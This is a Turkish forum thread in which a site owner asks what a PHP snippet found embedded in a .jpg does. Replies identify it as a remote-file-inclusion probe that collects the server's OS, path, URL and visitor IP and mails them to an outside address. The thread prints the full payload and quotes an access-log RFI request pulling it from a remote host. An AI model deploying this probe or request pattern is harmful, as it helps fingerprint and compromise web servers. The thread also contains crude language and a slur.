Bu Kodlar Ne İşe Yarar?
-
<? $win = strtolower(substr(PHP_OS,0,3)) == "win"; echo "B"."a"."M"."b"."Y"."<br>"; if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = true; $hsafemode = "4ON14"; } else {$safemode = false; $hsafemode = "9OFF14";} $xos = wordwrap(php_uname(),90,"<br>",1); $xpwd = @getcwd(); $os = "[3SAFEMODE: ".$hsafemode."14] [3Kernel:15 ".$xos."14]"; echo "<center><A class=ria href=\"http://".$os."\">";echo "B"."a"."M"."b"."Y</A></center><br>"; echo "<br>OSTYPE:$os<br>"; echo "<br>Pwd:$xpwd<br>"; $creator = ibne@tor.com; ($safe_mode)?($safemode="ON"):($safemode="OFF"); $base="http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; $name = php_uname(); $ip = getenv("REMOTE_ADDR"); $host = gethostbyaddr($_SERVER[REMOTE_ADDR]); $subj = $_SERVER['HTTP_HOST']; $msg = "\nBASE: $base\nuname -a: $name\nIP: $ip\nHost: $host\n$pwds\n"; $from ="From: MODE_=".$safemode."<tool@".$_SERVER['HTTP_HOST'].">"; mail( $creator, $subj, $msg, $from);die("<center> ByroeNet </center>"); ?>
-
tarayıcının cartın curtun bilgilerini çekiyo
bir aspcinin günlüğünden anca bu kadar anlaşılıyor
edit ayrıca anladığım kadarı ile sonunda mail olarak gönderiyor.
-
Safe mod bir güvenlik kapısıdır. Hem hostlar kullanır hemde windows, nasılki bir pc nin portları var, hostlarında muhtemel saldırı, trojan ve virüs lere karşı korunma ihtiyaçlarını bu şekilde gerçekleştirmektedirler.
Yani safe mod aktif olursa bilgisayarınızdan hostunuza otomatik yükleme yapma yetkiniz kapatılmış demektir. -
Bu kodlar .jpg dosyasına gömülerek benim hostum sayesinde güya başka sitelere saldırıda bulunuyormuşda nasıl bir saldırı metoduymuş öğreneyim istemiştim.Loglar şu şekilde;
217.xxx.x.x - - [08/Jan/2011:03:41:01 +0100] www.xxxxx.org 'GET /question/bad_link.php?theme_path=http://www.kruzhka.ru//logos/myid.jpg????????
HTTP/1.1' 302 5206İlk mesajdaki kodlarda myid.jpg nin içeriğidir.
-
vay amk saldırı kodumuymuş.
-
FOXXLY bunu yazdı:
-----------------------------
vay amk saldırı kodumuymuş.
-----------------------------Kodlar çok masum duruyor ama dedicated bunun bir saldırı olduğuna halen ısrar ediyor.
-
bende de bu çıkıyo doğrudan:
-
antivir-US bunu yazdı:
-----------------------------
bende de bu çıkıyo doğrudan:
-----------------------------vay amk siteyi açınca ötüyo direk :)
-
norton360 maşşallah çok güzel yakalıyor. kodu kopyaladım php olarak kayıtettim tık yok. Maşşallahaynen golden retreiver gibi hırsıza kasa gösteriyor.
-
16
$creator
= ibne@tor.com;
:D
-
Yüklendiği hostun bilgilerini alıp adam gönderiyor :) saldırı olarak düşünecek olursak o resim her açıldığında mail gönderiyordu. o salağın mailinide doldurmuştur :)